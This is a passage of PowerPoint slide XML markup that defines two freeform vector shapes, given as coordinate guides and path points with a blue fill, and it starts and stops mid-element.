                  <a:gd name="T25" fmla="*/ 187 h 206"/>
                  <a:gd name="T26" fmla="*/ 56 w 210"/>
                  <a:gd name="T27" fmla="*/ 174 h 206"/>
                  <a:gd name="T28" fmla="*/ 52 w 210"/>
                  <a:gd name="T29" fmla="*/ 164 h 206"/>
                  <a:gd name="T30" fmla="*/ 54 w 210"/>
                  <a:gd name="T31" fmla="*/ 159 h 206"/>
                  <a:gd name="T32" fmla="*/ 49 w 210"/>
                  <a:gd name="T33" fmla="*/ 147 h 206"/>
                  <a:gd name="T34" fmla="*/ 50 w 210"/>
                  <a:gd name="T35" fmla="*/ 136 h 206"/>
                  <a:gd name="T36" fmla="*/ 42 w 210"/>
                  <a:gd name="T37" fmla="*/ 108 h 206"/>
                  <a:gd name="T38" fmla="*/ 48 w 210"/>
                  <a:gd name="T39" fmla="*/ 103 h 206"/>
                  <a:gd name="T40" fmla="*/ 44 w 210"/>
                  <a:gd name="T41" fmla="*/ 97 h 206"/>
                  <a:gd name="T42" fmla="*/ 44 w 210"/>
                  <a:gd name="T43" fmla="*/ 92 h 206"/>
                  <a:gd name="T44" fmla="*/ 35 w 210"/>
                  <a:gd name="T45" fmla="*/ 79 h 206"/>
                  <a:gd name="T46" fmla="*/ 24 w 210"/>
                  <a:gd name="T47" fmla="*/ 58 h 206"/>
                  <a:gd name="T48" fmla="*/ 12 w 210"/>
                  <a:gd name="T49" fmla="*/ 34 h 206"/>
                  <a:gd name="T50" fmla="*/ 1 w 210"/>
                  <a:gd name="T51" fmla="*/ 17 h 206"/>
                  <a:gd name="T52" fmla="*/ 0 w 210"/>
                  <a:gd name="T53" fmla="*/ 10 h 206"/>
                  <a:gd name="T54" fmla="*/ 2 w 210"/>
                  <a:gd name="T55" fmla="*/ 4 h 206"/>
                  <a:gd name="T56" fmla="*/ 10 w 210"/>
                  <a:gd name="T57" fmla="*/ 6 h 206"/>
                  <a:gd name="T58" fmla="*/ 20 w 210"/>
                  <a:gd name="T59" fmla="*/ 0 h 206"/>
                  <a:gd name="T60" fmla="*/ 25 w 210"/>
                  <a:gd name="T61" fmla="*/ 0 h 206"/>
                  <a:gd name="T62" fmla="*/ 32 w 210"/>
                  <a:gd name="T63" fmla="*/ 6 h 206"/>
                  <a:gd name="T64" fmla="*/ 52 w 210"/>
                  <a:gd name="T65" fmla="*/ 7 h 206"/>
                  <a:gd name="T66" fmla="*/ 66 w 210"/>
                  <a:gd name="T67" fmla="*/ 7 h 206"/>
                  <a:gd name="T68" fmla="*/ 96 w 210"/>
                  <a:gd name="T69" fmla="*/ 7 h 206"/>
                  <a:gd name="T70" fmla="*/ 106 w 210"/>
                  <a:gd name="T71" fmla="*/ 8 h 206"/>
                  <a:gd name="T72" fmla="*/ 111 w 210"/>
                  <a:gd name="T73" fmla="*/ 13 h 206"/>
                  <a:gd name="T74" fmla="*/ 120 w 210"/>
                  <a:gd name="T75" fmla="*/ 15 h 206"/>
                  <a:gd name="T76" fmla="*/ 137 w 210"/>
                  <a:gd name="T77" fmla="*/ 16 h 206"/>
                  <a:gd name="T78" fmla="*/ 149 w 210"/>
                  <a:gd name="T79" fmla="*/ 16 h 206"/>
                  <a:gd name="T80" fmla="*/ 161 w 210"/>
                  <a:gd name="T81" fmla="*/ 15 h 206"/>
                  <a:gd name="T82" fmla="*/ 182 w 210"/>
                  <a:gd name="T83" fmla="*/ 11 h 206"/>
                  <a:gd name="T84" fmla="*/ 196 w 210"/>
                  <a:gd name="T85" fmla="*/ 9 h 206"/>
                  <a:gd name="T86" fmla="*/ 204 w 210"/>
                  <a:gd name="T87" fmla="*/ 10 h 206"/>
                  <a:gd name="T88" fmla="*/ 210 w 210"/>
                  <a:gd name="T89" fmla="*/ 13 h 206"/>
                  <a:gd name="T90" fmla="*/ 198 w 210"/>
                  <a:gd name="T91" fmla="*/ 16 h 206"/>
                  <a:gd name="T92" fmla="*/ 189 w 210"/>
                  <a:gd name="T93" fmla="*/ 24 h 206"/>
                  <a:gd name="T94" fmla="*/ 183 w 210"/>
                  <a:gd name="T95" fmla="*/ 18 h 206"/>
                  <a:gd name="T96" fmla="*/ 154 w 210"/>
                  <a:gd name="T97" fmla="*/ 23 h 206"/>
                  <a:gd name="T98" fmla="*/ 145 w 210"/>
                  <a:gd name="T99" fmla="*/ 32 h 206"/>
                  <a:gd name="T100" fmla="*/ 145 w 210"/>
                  <a:gd name="T101" fmla="*/ 48 h 206"/>
                  <a:gd name="T102" fmla="*/ 145 w 210"/>
                  <a:gd name="T103" fmla="*/ 85 h 206"/>
                  <a:gd name="T104" fmla="*/ 129 w 210"/>
                  <a:gd name="T105" fmla="*/ 86 h 206"/>
                  <a:gd name="T106" fmla="*/ 128 w 210"/>
                  <a:gd name="T107" fmla="*/ 106 h 206"/>
                  <a:gd name="T108" fmla="*/ 128 w 210"/>
                  <a:gd name="T109" fmla="*/ 128 h 20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210"/>
                  <a:gd name="T166" fmla="*/ 0 h 206"/>
                  <a:gd name="T167" fmla="*/ 210 w 210"/>
                  <a:gd name="T168" fmla="*/ 206 h 20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210" h="206">
                    <a:moveTo>
                      <a:pt x="128" y="135"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="135"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36373" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2926" y="3217"/>
                <a:ext cx="210" cy="206"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 210"/>
                  <a:gd name="T1" fmla="*/ 162 h 206"/>
                  <a:gd name="T2" fmla="*/ 128 w 210"/>
                  <a:gd name="T3" fmla="*/ 195 h 206"/>
                  <a:gd name="T4" fmla="*/ 124 w 210"/>
                  <a:gd name="T5" fmla="*/ 199 h 206"/>
                  <a:gd name="T6" fmla="*/ 116 w 210"/>
                  <a:gd name="T7" fmla="*/ 206 h 206"/>
                  <a:gd name="T8" fmla="*/ 109 w 210"/>
                  <a:gd name="T9" fmla="*/ 205 h 206"/>
                  <a:gd name="T10" fmla="*/ 98 w 210"/>
                  <a:gd name="T11" fmla="*/ 205 h 206"/>
                  <a:gd name="T12" fmla="*/ 92 w 210"/>
                  <a:gd name="T13" fmla="*/ 203 h 206"/>
                  <a:gd name="T14" fmla="*/ 91 w 210"/>
                  <a:gd name="T15" fmla="*/ 196 h 206"/>
                  <a:gd name="T16" fmla="*/ 85 w 210"/>
                  <a:gd name="T17" fmla="*/ 191 h 206"/>
                  <a:gd name="T18" fmla="*/ 81 w 210"/>
                  <a:gd name="T19" fmla="*/ 191 h 206"/>
                  <a:gd name="T20" fmla="*/ 77 w 210"/>
                  <a:gd name="T21" fmla="*/ 196 h 206"/>
                  <a:gd name="T22" fmla="*/ 72 w 210"/>
                  <a:gd name="T23" fmla="*/ 199 h 206"/>
                  <a:gd name="T24" fmla="*/ 62 w 210"/>
                  <a:gd name="T25" fmla="*/ 187 h 206"/>
                  <a:gd name="T26" fmla="*/ 56 w 210"/>
                  <a:gd name="T27" fmla="*/ 174 h 206"/>
                  <a:gd name="T28" fmla="*/ 52 w 210"/>
                  <a:gd name="T29" fmla="*/ 164 h 206"/>
                  <a:gd name="T30" fmla="*/ 54 w 210"/>
                  <a:gd name="T31" fmla="*/ 159 h 206"/>
                  <a:gd name="T32" fmla="*/ 49 w 210"/>
                  <a:gd name="T33" fmla="*/ 147 h 206"/>
                  <a:gd name="T34" fmla="*/ 50 w 210"/>
                  <a:gd name="T35" fmla="*/ 136 h 206"/>
                  <a:gd name="T36" fmla="*/ 42 w 210"/>
                  <a:gd name="T37" fmla="*/ 108 h 206"/>
                  <a:gd name="T38" fmla="*/ 48 w 210"/>
                  <a:gd name="T39" fmla="*/ 103 h 206"/>
                  <a:gd name="T40" fmla="*/ 44 w 210"/>
                  <a:gd name="T41" fmla="*/ 97 h 206"/>
                  <a:gd name="T42" fmla="*/ 44 w 210"/>
                  <a:gd name="T43" fmla="*/ 92 h 206"/>
                  <a:gd name="T44" fmla="*/ 35 w 210"/>
                  <a:gd name="T45" fmla="*/ 79 h 206"/>
                  <a:gd name="T46" fmla="*/ 24 w 210"/>
                  <a:gd name="T47" fmla="*/ 58 h 206"/>
                  <a:gd name="T48" fmla="*/ 12 w 210"/>
                  <a:gd name="T49" fmla="*/ 34 h 206"/>
                  <a:gd name="T50" fmla="*/ 1 w 210"/>
                  <a:gd name="T51" fmla="*/ 17 h 206"/>
                  <a:gd name="T52" fmla="*/ 0 w 210"/>
                  <a:gd name="T53" fmla="*/ 10 h 206"/>
                  <a:gd name="T54" fmla="*/ 2 w 210"/>
                  <a:gd name="T55" fmla="*/ 4 h 206"/>
                  <a:gd name="T56" fmla="*/ 10 w 210"/>
                  <a:gd name="T57" fmla="*/ 6 h 206"/>
                  <a:gd name="T58" fmla="*/ 20 w 210"/>
                  <a:gd name="T59" fmla="*/ 0 h 206"/>
                  <a:gd name="T60" fmla="*/ 25 w 210"/>
                  <a:gd name="T61" fmla="*/ 0 h 206"/>
                  <a:gd name="T62" fmla="*/ 32 w 210"/>
                  <a:gd name="T63" fmla="*/ 6 h 206"/>
                  <a:gd name="T64" fmla="*/ 52 w 210"/>
                  <a:gd name="T65" fmla="*/ 7 h 206"/>
                  <a:gd name="T66" fmla="*/ 66 w 210"/>
                  <a:gd name="T67" fmla="*/ 7 h 206"/>
                  <a:gd name="T68" fmla="*/ 96 w 210"/>
                  <a:gd name="T69" fmla="*/ 7 h 206"/>
                  <a:gd name="T70" fmla="*/ 106 w 210"/>
                  <a:gd name="T71" fmla="*/ 8 h 206"/>
                  <a:gd name="T72" fmla="*/ 111 w 210"/>
                  <a:gd name="T73" fmla="*/ 13 h 206"/>
                  <a:gd name="T74" fmla="*/ 120 w 210"/>
                  <a:gd name="T75" fmla="*/ 15 h 206"/>
                  <a:gd name="T76" fmla="*/ 137 w 210"/>
                  <a:gd name="T77" fmla="*/ 16 h 206"/>
                  <a:gd name="T78" fmla="*/ 149 w 210"/>
                  <a:gd name="T79" fmla="*/ 16 h 206"/>
                  <a:gd name="T80" fmla="*/ 161 w 210"/>
                  <a:gd name="T81" fmla="*/ 15 h 206"/>
                  <a:gd name="T82" fmla="*/ 182 w 210"/>
                  <a:gd name="T83" fmla="*/ 11 h 206"/>
                  <a:gd name="T84" fmla="*/ 196 w 210"/>
                  <a:gd name="T85" fmla="*/ 9 h 206"/>
                  <a:gd name="T86" fmla="*/ 204 w 210"/>
                  <a:gd name="T87" fmla="*/ 10 h 206"/>
                  <a:gd name="T88" fmla="*/ 210 w 210"/>
                  <a:gd name="T89" fmla="*/ 13 h 206"/>
                  <a:gd name="T90" fmla="*/ 198 w 210"/>
                  <a:gd name="T91" fmla="*/ 16 h 206"/>
                  <a:gd name="T92" fmla="*/ 189 w 210"/>
                  <a:gd name="T93" fmla="*/ 24 h 206"/>
                  <a:gd name="T94" fmla="*/ 183 w 210"/>
                  <a:gd name="T95" fmla="*/ 18 h 206"/>
                  <a:gd name="T96" fmla="*/ 154 w 210"/>
                  <a:gd name="T97" fmla="*/ 23 h 206"/>
                  <a:gd name="T98" fmla="*/ 145 w 210"/>
                  <a:gd name="T99" fmla="*/ 32 h 206"/>
                  <a:gd name="T100" fmla="*/ 145 w 210"/>
                  <a:gd name="T101" fmla="*/ 48 h 206"/>
                  <a:gd name="T102" fmla="*/ 145 w 210"/>
                  <a:gd name="T103" fmla="*/ 85 h 206"/>
                  <a:gd name="T104" fmla="*/ 129 w 210"/>
                  <a:gd name="T105" fmla="*/ 86 h 206"/>
                  <a:gd name="T106" fmla="*/ 128 w 210"/>
                  <a:gd name="T107" fmla="*/ 106 h 206"/>
                  <a:gd name="T108" fmla="*/ 128 w 210"/>
                  <a:gd name="T109" fmla="*/ 128 h 20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210"/>
                  <a:gd name="T166" fmla="*/ 0 h 206"/>
                  <a:gd name="T167" fmla="*/ 210 w 210"/>
                  <a:gd name="T168" fmla="*/ 206 h 20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210" h="206">
                    <a:moveTo>
                      <a:pt x="128" y="135"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="86"/>
